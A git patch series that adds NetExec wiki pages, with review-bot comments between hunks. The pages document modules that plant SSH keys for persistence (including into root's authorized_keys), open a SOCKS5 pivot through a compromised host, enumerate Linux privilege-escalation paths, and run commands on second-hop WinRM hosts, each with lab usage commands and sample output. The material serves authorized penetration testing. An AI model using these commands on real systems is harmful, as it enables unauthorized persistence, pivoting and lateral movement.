From ba5a7596adf43cb0af9e08a833b82b8381da506f Mon Sep 17 00:00:00 2001 From: overgrowncarrot1 Date: Wed, 20 Aug 2025 06:11:32 -0700 Subject: [PATCH 1/4] Add ssh_socks and persist_key module documentation to wiki --- ssh-protocol/persist_key.md | 71 +++++++++++++++++++++++++++++++++++++ ssh-protocol/ssh_socks.md | 39 ++++++++++++++++++++ 2 files changed, 110 insertions(+) create mode 100644 ssh-protocol/persist_key.md create mode 100644 ssh-protocol/ssh_socks.md diff --git a/ssh-protocol/persist_key.md b/ssh-protocol/persist_key.md new file mode 100644 index 0000000..ba5f9fc --- /dev/null +++ b/ssh-protocol/persist_key.md 
@@ -0,0 +1,71 @@ +# `persist_key` Module + +The `persist_key` module allows you to **inject or remove SSH public keys** into a targetโ€™s +`~/.ssh/authorized_keys` file for persistence on Linux systems. + +--- + +## ๐Ÿ“– Description + +- **Module name:** `persist_key` +- **Purpose:** Maintain persistent access by planting or removing SSH keys. +- **Protocols:** `ssh` +- **OpSec safe:** โš ๏ธ Yes (but persistence is detectable). +- **Multiple hosts:** โŒ No โ€” one SSH session at a time. + +--- + +## โš™๏ธ Options + +| Option | Default | Description | +|------------|----------|-----------------------------------------------------------------------------| +| `PUBKEY` | *(auto)* | Path to a public key file, or the raw public key string. Defaults to scanning `~/.ssh/id_*.pub`. | +| `USER` | *(auto)* | Target username. Defaults to the logged-in SSH user. | +| `BACKUP` | `true` | Whether to back up `authorized_keys` before modifying. (`true/false`) | +| `REMOVE` | `false` | Remove mode: `true` (remove key), or `backup` (remove key + delete backup). | +| `KEX` | *(none)* | Comma-separated list of KEX algorithms (legacy compatibility). | +| `HOSTKEY` | *(none)* | Comma-separated list of hostkey algorithms (legacy compatibility). | + +--- + +## โ–ถ๏ธ Usage + +### Add your default SSH key +```bash +nxc ssh -u -p -M persist_key +nxc ssh -u -p -M persist_key -o PUBKEY=/path/to/key.pub``` + +To use copy and pasted public key +```bash +nxc ssh -u -p -M persist_key -o PUBKEY="ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI... 
attacker@host"``` + +To drop key into another users folder +```bash +nxc ssh -u -p -M persist_key -o PUBKEY=/tmp/key.pub,USER=root``` + +To not backup keys on target system +```bash +nxc ssh -u -p -M persist_key -o BACKUP=false +``` + +Remove a previously added key +```bash +nxc ssh -u -p -M persist_key -o REMOVE=true,PUBKEY=/tmp/key.pub +``` + +Remove key and delete backup (bring back to original environment will not remove other authorized keys already on target system +```bash +nxc ssh -u -p -M persist_key -o REMOVE=backup,PUBKEY=/tmp/key.pub +``` + +Use Legacy +```bash +nxc ssh -u -p -M persist_key -o KEX="diffie-hellman-group1-sha1",HOSTKEY="ssh-rsa" +``` + +Autoremove added keys, and bring target system to original state +```bash +nxc ssh -u -p -M persist_key -o REMOVE=backup +``` + + diff --git a/ssh-protocol/ssh_socks.md b/ssh-protocol/ssh_socks.md new file mode 100644 index 0000000..c9eba87 --- /dev/null +++ b/ssh-protocol/ssh_socks.md 
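Review bot: the Description block in persist_key.md contradicts itself with "OpSec safe: Yes (but persistence is detectable)"; planting a key rewrites `~/.ssh/authorized_keys` and, with `BACKUP=true`, leaves a second copy on disk, both of which are exactly what file-integrity monitoring and audit rules on `.ssh/` fire on, so mark it as not OpSec safe and state where the backup is written, under what name and with what permissions, since the page never says. The Usage commands lack a target host and values for `-u`/`-p` (`nxc ssh -u -p -M persist_key`); if the placeholders were written as `<target> <user> <pass>` they are swallowed by the wiki renderer, so use backticked or brace-style placeholders. Three closing fences sit on the same line as the command (`-o PUBKEY=/path/to/key.pub```), which breaks rendering, and "Remove key and delete backup (bring back to original environment will not remove other authorized keys already on target system" has an unclosed parenthesis and should be split into two statements: that the backup file is deleted, and that keys already present before the module ran are left untouched.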
@@ -0,0 +1,39 @@ +# `ssh_socks` Module + +The `ssh_socks` module provides a **SOCKS5 proxy** over an existing SSH connection. +It allows tunneling network traffic from your attacking host through the compromised SSH target. + +--- + +## ๐Ÿ“– Description + +- **Module name:** `ssh_socks` +- **Purpose:** Expose a SOCKS5 proxy bound locally (default: `127.0.0.1:1080`). +- **Protocols:** `ssh` +- **OpSec safe:** โœ… Yes โ€” works via existing SSH transport. +- **Multiple hosts:** โŒ No โ€” one SSH session at a time. + +--- + +## โš™๏ธ Options + +| Option | Default | Description | +|----------|----------|-----------------------------------------------------------------------------| +| `PORT` | `1080` | Local port to bind the SOCKS5 proxy. | +| `KEX` | *(none)* | Comma-separated list of key exchange algorithms to force (for legacy hosts). | +| `HOSTKEY`| *(none)* | Comma-separated list of hostkey algorithms to force (for legacy hosts). | + +--- + +## โ–ถ๏ธ Usage + +### Basic usage (default SOCKS5 proxy) +Start a SOCKS5 proxy on `127.0.0.1:1080`: +```bash +nxc ssh -u -p -M ssh_socks +nxc ssh -u -p -M ssh_socks -o PORT=9050 +nxc ssh -u -p -M ssh_socks -o KEX="diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1" +nxc ssh -u -p -M ssh_socks -o HOSTKEY="ssh-rsa,ssh-dss" +nxc ssh -u -p -M ssh_socks -o PORT=1081,KEX="diffie-hellman-group1-sha1",HOSTKEY="ssh-rsa" +``` +To stop proxy ctrl+c in terminal window From bbd5062a55bc6a9d10f0a364efc53bbdae8e5fd9 Mon Sep 17 00:00:00 2001 
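Review bot: ssh_socks.md should say that the proxy depends on the target sshd permitting TCP forwarding (`AllowTcpForwarding yes` in sshd_config, the OpenSSH default); when an administrator has set it to `no`, the local SOCKS5 listener still accepts connections but every channel the module opens through the session is refused, and the page gives the reader no hint why. The same missing-placeholder problem as in persist_key.md applies to every command (`nxc ssh -u -p -M ssh_socks`). The five commands under the single heading "Basic usage (default SOCKS5 proxy)" actually cover the PORT, KEX and HOSTKEY variants, so split them into their own subsections or comment each line, and "To stop proxy ctrl+c in terminal window" should read "Press Ctrl+C in the terminal to stop the proxy."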
From: overgrowncarrot1 Date: Wed, 27 Aug 2025 12:25:00 +0000 Subject: [PATCH 2/4] Updated Wiki for Linux Priv Esc Check module --- ssh-protocol/linux_privesc_check.md | 88 +++++++++++++++++++++++++++++ ssh-protocol/persist_key.md | 71 ----------------------- ssh-protocol/ssh_socks.md | 39 ------------- 3 files changed, 88 insertions(+), 110 deletions(-) create mode 100644 ssh-protocol/linux_privesc_check.md delete mode 100644 ssh-protocol/persist_key.md delete mode 100644 ssh-protocol/ssh_socks.md diff --git a/ssh-protocol/linux_privesc_check.md b/ssh-protocol/linux_privesc_check.md new file mode 100644 index 0000000..418ef96 --- /dev/null +++ b/ssh-protocol/linux_privesc_check.md 
@@ -0,0 +1,88 @@ +# Linux Privilege Escalation Check (NetExec Module) + +The `linux_privesc_check` module helps identify common privilege escalation paths on Linux hosts. +It does **not exploit** vulnerabilities directly โ€” it highlights possible escalation methods for further manual testing. + +--- + +## Module Options + +- **NO_SUDO**: Skip `sudo -l` checks +- **NO_GTF**: Skip GTFOBins lookups (no internet required) +- **SHOW_ALL_SUID**: Show *all* SUID binaries (not just GTFOBins-exploitable ones) +- **SHOW_ALL_CAPS**: Show *all* binaries with Linux capabilities + +--- + +## Attack Examples + +### 1. Run Full Enumeration (default) +```bash +nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check +``` + +### 1.1 Expected Ouput +```bash +[linux_privesc_check] Running Linux privilege escalation checks... +[Kernel] Linux victim 5.15.0-86-generic #96-Ubuntu SMP x86_64 GNU/Linux +[User Info] uid=1000(alice) gid=1000(alice) groups=1000(alice) +[Sudo] Checking sudo -l... + (ALL : ALL) NOPASSWD: /usr/bin/vim -> https://gtfobins.github.io/gtfobins/vim/#sudo +[SUID] Checking for exploitable SUID binaries... +Exploit SUID: /usr/bin/find -> https://gtfobins.github.io/gtfobins/find/#suid +[Capabilities] Checking for binaries with capabilities... +Capability: /usr/bin/python3.8 = cap_setuid+ep -> https://gtfobins.github.io/gtfobins/python/#capabilities +``` + +### 2. Skip Sudo (no sudo -l) +```bash +nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check -o NO_SUDO=true +``` + +### 2.1 Expected Output +```bash +[linux_privesc_check] Skipping sudo -l enumeration (NO_SUDO) +[SUID] Checking for exploitable SUID binaries... +... +``` + +### 3. Skip GTFOBins Lookup +```bash +nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check -o NO_GTF=true +``` + +### 3.1 Expected Output +```bash +[linux_privesc_check] Skipping GTFOBins lookups (NO_GTF) +[SUID] Checking for exploitable SUID binaries... 
+Exploit SUID: /usr/bin/passwd +[Capabilities] Checking for binaries with capabilities... +Capability: /usr/bin/tar = cap_dac_read_search+ep +``` + +### 4. Show all SUID Binaries +```bash +nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check -o SHOW_ALL_SUID=true +``` + +### 4.1 Expected Output +```bash +[SUID] Checking for exploitable SUID binaries... +Exploit SUID: /usr/bin/passwd +Exploit SUID: /usr/bin/chsh +Exploit SUID: /usr/bin/su +... +``` + +### 5. Show all Capabilites +```bash +nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check -o SHOW_ALL_CAPS=true +``` + +### 5.1 Expected Output +```bash +[Capabilities] Checking for binaries with capabilities... +Capability: /usr/bin/ping = cap_net_raw+ep +Capability: /usr/bin/python3.8 = cap_setuid+ep +... +``` \ No newline at end of file diff --git a/ssh-protocol/persist_key.md b/ssh-protocol/persist_key.md deleted file mode 100644 index ba5f9fc..0000000 --- a/ssh-protocol/persist_key.md +++ /dev/null 
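Review bot: the "Exploit SUID:" label is misleading once GTFOBins filtering is off; in 3.1 and 4.1 it is printed for `/usr/bin/passwd`, `/usr/bin/chsh` and `/usr/bin/su`, which are standard setuid binaries with no GTFOBins entry, so under `NO_GTF` and `SHOW_ALL_SUID` the prefix should be a neutral "SUID:" and "Exploit" reserved for matches. The page also needs to say where the GTFOBins lookup happens: "NO_GTF: Skip GTFOBins lookups (no internet required)" implies the default needs network access, and a reader must know whether that request leaves the operator host or the compromised target, which is an OpSec decision. The `[Sudo] Checking sudo -l...` step should document how the password prompt is handled (whether the `-p` value is fed to sudo, or the check silently fails when NOPASSWD is not set). Smaller points: "Expected Ouput" and "Show all Capabilites" are typos, the options list should state that all four are booleans taking `true`, and the file is missing a trailing newline.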
@@ -1,71 +0,0 @@ -# `persist_key` Module - -The `persist_key` module allows you to **inject or remove SSH public keys** into a targetโ€™s -`~/.ssh/authorized_keys` file for persistence on Linux systems. - ---- - -## ๐Ÿ“– Description - -- **Module name:** `persist_key` -- **Purpose:** Maintain persistent access by planting or removing SSH keys. -- **Protocols:** `ssh` -- **OpSec safe:** โš ๏ธ Yes (but persistence is detectable). -- **Multiple hosts:** โŒ No โ€” one SSH session at a time. - ---- - -## โš™๏ธ Options - -| Option | Default | Description | -|------------|----------|-----------------------------------------------------------------------------| -| `PUBKEY` | *(auto)* | Path to a public key file, or the raw public key string. Defaults to scanning `~/.ssh/id_*.pub`. | -| `USER` | *(auto)* | Target username. Defaults to the logged-in SSH user. | -| `BACKUP` | `true` | Whether to back up `authorized_keys` before modifying. (`true/false`) | -| `REMOVE` | `false` | Remove mode: `true` (remove key), or `backup` (remove key + delete backup). | -| `KEX` | *(none)* | Comma-separated list of KEX algorithms (legacy compatibility). | -| `HOSTKEY` | *(none)* | Comma-separated list of hostkey algorithms (legacy compatibility). | - ---- - -## โ–ถ๏ธ Usage - -### Add your default SSH key -```bash -nxc ssh -u -p -M persist_key -nxc ssh -u -p -M persist_key -o PUBKEY=/path/to/key.pub``` - -To use copy and pasted public key -```bash -nxc ssh -u -p -M persist_key -o PUBKEY="ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI... 
attacker@host"``` - -To drop key into another users folder -```bash -nxc ssh -u -p -M persist_key -o PUBKEY=/tmp/key.pub,USER=root``` - -To not backup keys on target system -```bash -nxc ssh -u -p -M persist_key -o BACKUP=false -``` - -Remove a previously added key -```bash -nxc ssh -u -p -M persist_key -o REMOVE=true,PUBKEY=/tmp/key.pub -``` - -Remove key and delete backup (bring back to original environment will not remove other authorized keys already on target system -```bash -nxc ssh -u -p -M persist_key -o REMOVE=backup,PUBKEY=/tmp/key.pub -``` - -Use Legacy -```bash -nxc ssh -u -p -M persist_key -o KEX="diffie-hellman-group1-sha1",HOSTKEY="ssh-rsa" -``` - -Autoremove added keys, and bring target system to original state -```bash -nxc ssh -u -p -M persist_key -o REMOVE=backup -``` - - diff --git a/ssh-protocol/ssh_socks.md b/ssh-protocol/ssh_socks.md deleted file mode 100644 index c9eba87..0000000 --- a/ssh-protocol/ssh_socks.md +++ /dev/null 
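Review bot: this hunk and the next one delete ssh-protocol/persist_key.md and ssh-protocol/ssh_socks.md, the two files patch 1 added, in a commit whose subject is "Updated Wiki for Linux Priv Esc Check module", with no rationale; that pattern looks like the branch was rebuilt from a stale base rather than an intentional withdrawal. Drop the two deletion hunks so the series is purely additive, or, if the modules really were removed, put the deletion in its own commit that says why.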
@@ -1,39 +0,0 @@ -# `ssh_socks` Module - -The `ssh_socks` module provides a **SOCKS5 proxy** over an existing SSH connection. -It allows tunneling network traffic from your attacking host through the compromised SSH target. - ---- - -## ๐Ÿ“– Description - -- **Module name:** `ssh_socks` -- **Purpose:** Expose a SOCKS5 proxy bound locally (default: `127.0.0.1:1080`). -- **Protocols:** `ssh` -- **OpSec safe:** โœ… Yes โ€” works via existing SSH transport. -- **Multiple hosts:** โŒ No โ€” one SSH session at a time. - ---- - -## โš™๏ธ Options - -| Option | Default | Description | -|----------|----------|-----------------------------------------------------------------------------| -| `PORT` | `1080` | Local port to bind the SOCKS5 proxy. | -| `KEX` | *(none)* | Comma-separated list of key exchange algorithms to force (for legacy hosts). | -| `HOSTKEY`| *(none)* | Comma-separated list of hostkey algorithms to force (for legacy hosts). | - ---- - -## โ–ถ๏ธ Usage - -### Basic usage (default SOCKS5 proxy) -Start a SOCKS5 proxy on `127.0.0.1:1080`: -```bash -nxc ssh -u -p -M ssh_socks -nxc ssh -u -p -M ssh_socks -o PORT=9050 -nxc ssh -u -p -M ssh_socks -o KEX="diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1" -nxc ssh -u -p -M ssh_socks -o HOSTKEY="ssh-rsa,ssh-dss" -nxc ssh -u -p -M ssh_socks -o PORT=1081,KEX="diffie-hellman-group1-sha1",HOSTKEY="ssh-rsa" -``` -To stop proxy ctrl+c in terminal window From f1ec7ba7b19b0849e7fe3c4849a9c6979b3c6149 Mon Sep 17 00:00:00 2001 From: overgrowncarrot1 Date: Wed, 27 Aug 2025 12:54:03 +0000 Subject: [PATCH 3/4] Updated Wiki for WinRm Relay Module --- ssh-protocol/linux_privesc_check.md | 88 ----------------------------- winrm-protocol/winrm-relay.md | 52 +++++++++++++++++ 2 files changed, 52 insertions(+), 88 deletions(-) delete mode 100644 ssh-protocol/linux_privesc_check.md create mode 100644 winrm-protocol/winrm-relay.md 
diff --git a/ssh-protocol/linux_privesc_check.md b/ssh-protocol/linux_privesc_check.md deleted file mode 100644 index 418ef96..0000000 --- a/ssh-protocol/linux_privesc_check.md +++ /dev/null 
@@ -1,88 +0,0 @@ -# Linux Privilege Escalation Check (NetExec Module) - -The `linux_privesc_check` module helps identify common privilege escalation paths on Linux hosts. -It does **not exploit** vulnerabilities directly โ€” it highlights possible escalation methods for further manual testing. - ---- - -## Module Options - -- **NO_SUDO**: Skip `sudo -l` checks -- **NO_GTF**: Skip GTFOBins lookups (no internet required) -- **SHOW_ALL_SUID**: Show *all* SUID binaries (not just GTFOBins-exploitable ones) -- **SHOW_ALL_CAPS**: Show *all* binaries with Linux capabilities - ---- - -## Attack Examples - -### 1. Run Full Enumeration (default) -```bash -nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check -``` - -### 1.1 Expected Ouput -```bash -[linux_privesc_check] Running Linux privilege escalation checks... -[Kernel] Linux victim 5.15.0-86-generic #96-Ubuntu SMP x86_64 GNU/Linux -[User Info] uid=1000(alice) gid=1000(alice) groups=1000(alice) -[Sudo] Checking sudo -l... - (ALL : ALL) NOPASSWD: /usr/bin/vim -> https://gtfobins.github.io/gtfobins/vim/#sudo -[SUID] Checking for exploitable SUID binaries... -Exploit SUID: /usr/bin/find -> https://gtfobins.github.io/gtfobins/find/#suid -[Capabilities] Checking for binaries with capabilities... -Capability: /usr/bin/python3.8 = cap_setuid+ep -> https://gtfobins.github.io/gtfobins/python/#capabilities -``` - -### 2. Skip Sudo (no sudo -l) -```bash -nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check -o NO_SUDO=true -``` - -### 2.1 Expected Output -```bash -[linux_privesc_check] Skipping sudo -l enumeration (NO_SUDO) -[SUID] Checking for exploitable SUID binaries... -... -``` - -### 3. Skip GTFOBins Lookup -```bash -nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check -o NO_GTF=true -``` - -### 3.1 Expected Output -```bash -[linux_privesc_check] Skipping GTFOBins lookups (NO_GTF) -[SUID] Checking for exploitable SUID binaries... 
-Exploit SUID: /usr/bin/passwd -[Capabilities] Checking for binaries with capabilities... -Capability: /usr/bin/tar = cap_dac_read_search+ep -``` - -### 4. Show all SUID Binaries -```bash -nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check -o SHOW_ALL_SUID=true -``` - -### 4.1 Expected Output -```bash -[SUID] Checking for exploitable SUID binaries... -Exploit SUID: /usr/bin/passwd -Exploit SUID: /usr/bin/chsh -Exploit SUID: /usr/bin/su -... -``` - -### 5. Show all Capabilites -```bash -nxc ssh 192.168.56.101 -u alice -p alice123 -M linux_privesc_check -o SHOW_ALL_CAPS=true -``` - -### 5.1 Expected Output -```bash -[Capabilities] Checking for binaries with capabilities... -Capability: /usr/bin/ping = cap_net_raw+ep -Capability: /usr/bin/python3.8 = cap_setuid+ep -... -``` \ No newline at end of file diff --git a/winrm-protocol/winrm-relay.md b/winrm-protocol/winrm-relay.md new file mode 100644 index 0000000..07597a9 --- /dev/null +++ b/winrm-protocol/winrm-relay.md 
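Review bot: the same problem as in patch 2: this commit, titled for the WinRM relay page, deletes ssh-protocol/linux_privesc_check.md that the previous commit created, so after patch 3 every SSH module page added in this series has been removed again and after patch 4 only winrm-protocol/winrmjump.md survives. Rebase the four commits so each one only adds or edits its own file; as it stands, merging the series loses three documentation pages.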
@@ -0,0 +1,52 @@ +# WinRM Relay Module + +This module allows relaying commands from one WinRM host to another. +It can be used to execute commands on a relayed target by authenticating through another WinRM host. + +Options structure is as follows +```bash +REMOTE=::: +``` + +For more than one relay +```bash +REMOTE=:::,REMOTE=:::,REMOTE=::: +``` +--- + +## Example 1: Relay with username and password (utilizing same username and password on remote machine) + +### Command +```bash +nxc winrm 192.168.56.12 \ + -u user1 -p 'Passw0rd!' \ + -x whoami \ + -M winrm_relay \ + -o REMOTE=192.168.56.11 +``` + +### Expected Response + +```bash +[*] Authenticating to 192.168.56.12 as user1 +[+] Authentication successful +[*] Relaying to 192.168.56.11 +[+] whoami executed successfully +domain\user1 +``` + +### Relay Alternate Usernames and Passwords Along with Alternate Domain (multiple relays) + +```bash +nxc winrm 192.168.56.11 -u vagrant -p vagrant -x hostname -M winrm_relay -o REMOTE='192.168.56.12:admin:P@ssw0rd!:ESSOS.LOCAL','KINGSLANDING:admin:P@ssw0rd!:sevenkingdoms.local' +``` + +### Expected Response + +```bash +WINRM 192.168.56.11 5985 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 (name:WINTERFELL) (domain:north.sevenkingdoms.local) +WINRM 192.168.56.11 5985 WINTERFELL [+] north.sevenkingdoms.local\vagrant:vagrant (Pwn3d!) +WINRM_RELAY 192.168.56.11 5985 WINTERFELL meereen: essos\admin +WINRM_RELAY 192.168.56.11 5985 WINTERFELL KINGSLANDING.sevenkingdoms.local: sevenkingdoms\admin +``` + From 7fb6df0d1b6239893d60882f7b37915d20718ff5 Mon Sep 17 00:00:00 2001 From: overgrowncarrot1 Date: Mon, 1 Sep 2025 15:21:14 +0000 Subject: [PATCH 4/4] Added winrmjump to wiki for PR 903 --- winrm-protocol/{winrm-relay.md => winrmjump.md} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename winrm-protocol/{winrm-relay.md => winrmjump.md} (79%) 
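Review bot: the option syntax in winrm-relay.md is unusable as written: `REMOTE=:::` shows only separators, and the multi-relay form `REMOTE=:::,REMOTE=:::,REMOTE=:::` (repeated keys) does not match the worked example, which passes a single REMOTE with a quoted comma-separated list (`REMOTE='192.168.56.12:admin:P@ssw0rd!:ESSOS.LOCAL','KINGSLANDING:admin:P@ssw0rd!:sevenkingdoms.local'`). Spell out the field order (host, username, password, domain), whether the fields after host are optional (Example 1 passes a bare `REMOTE=192.168.56.11` and reuses the initial credentials), and which of the two multi-target forms the module actually parses. Example 1's "Expected Response" (`[*] Authenticating to 192.168.56.12 as user1` and so on) is not NetExec's output format, whereas the second example shows the real `WINRM 192.168.56.11 5985 WINTERFELL ...` lines; replace the first with a genuine capture. One sentence of scope would also help: despite the name this is a credential pivot through an authenticated WinRM session (a second hop with plaintext credentials supplied on the command line), not an NTLM relay, and those passwords are visible in shell history and the operator host's process list.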
diff --git a/winrm-protocol/winrm-relay.md b/winrm-protocol/winrmjump.md similarity index 79% rename from winrm-protocol/winrm-relay.md rename to winrm-protocol/winrmjump.md index 07597a9..05f6120 100644 --- a/winrm-protocol/winrm-relay.md +++ b/winrm-protocol/winrmjump.md @@ -5,12 +5,12 @@ It can be used to execute commands on a relayed target by authenticating through Options structure is as follows ```bash -REMOTE=::: +REMOTE= ``` For more than one relay ```bash -REMOTE=:::,REMOTE=:::,REMOTE=::: +REMOTE= ,REMOTE= ,REMOTE= ``` --- @@ -38,7 +38,7 @@ domain\user1 ### Relay Alternate Usernames and Passwords Along with Alternate Domain (multiple relays) ```bash -nxc winrm 192.168.56.11 -u vagrant -p vagrant -x hostname -M winrm_relay -o REMOTE='192.168.56.12:admin:P@ssw0rd!:ESSOS.LOCAL','KINGSLANDING:admin:P@ssw0rd!:sevenkingdoms.local' +nxc winrm 192.168.56.11 -u vagrant -p vagrant -x hostname -M winrm_relay -o REMOTE='192.168.56.12 admin P@ssw0rd! ESSOS.LOCAL','KINGSLANDING admin P@ssw0rd! sevenkingdoms.local' ``` ### Expected Response
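Review bot: the rename to winrmjump.md and the subject "Added winrmjump to wiki for PR 903" imply the module was renamed, but the commands in the file still invoke `-M winrm_relay` and the title still reads "WinRM Relay Module"; update those to the module name registered in PR 903 or the page documents a module that no longer loads under that name. The hunk also switches the REMOTE field separator from `:` to whitespace (`'192.168.56.12 admin P@ssw0rd! ESSOS.LOCAL'`) while the placeholder lines collapse to `REMOTE= ` and `REMOTE= ,REMOTE= ,REMOTE= `, which still show no field names; state explicitly that each entry is whitespace-separated host, user, password, domain, and note that a password containing a space cannot be passed in this format (the colon form had the same limitation for passwords containing `:`). The multi-relay placeholder still uses repeated `REMOTE=` keys while the example below it uses a single quoted comma-separated list, so one of the two is wrong.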